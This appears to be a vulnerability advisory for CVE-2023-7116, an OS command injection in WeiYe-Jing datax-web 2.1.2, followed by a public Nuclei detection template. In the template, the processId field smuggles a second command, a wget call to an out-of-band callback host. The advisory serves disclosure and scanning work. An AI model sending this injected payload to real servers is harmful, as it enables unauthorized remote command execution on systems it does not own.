CVE-2023-7116: WeiYe-Jing datax-web <= 2.1.2 - OS Command Injection

日期: 2025-08-01 | 影响软件: WeiYe Jing datax web | POC: 已公开

漏洞描述

A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability.

PoC代码[已公开]

id: CVE-2023-7116

info:
  name: WeiYe-Jing datax-web <= 2.1.2 - OS Command Injection
  author: pussycat0x
  severity: medium
  description: |
    A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability.
  reference:
    - https://vuldb.com/?ctiid.249086
    - https://vuldb.com/?id.249086
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 6.3
    cve-id: CVE-2023-7116
    cwe-id: CWE-78
    epss-score: 0.49103
    epss-percentile: 0.97712
    cpe: cpe:2.3:a:datax-web_project:datax-web:2.1.2:*:*:*:*:*:*:*
  metadata:
    vendor: datax-web_project
    product: datax-web
  tags: cve,cve2023,datax-web,oast,rce

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - "<title>Datax Web"
        internal: true

  - raw:
      - |
        POST /api/log/killJob HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        {"processId":"1 & wget http://{{interactsh-url}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f8ed20b2a6cd59104e5d3389b67be9c61d0549c6e30f32240b257c373f6dddd9022100b5c0d2fb3c3a57cf10a547a70ed30b25b3aad1ae92729a51810871d4e30270ae:922c64590222798bb761d5b6d8e72950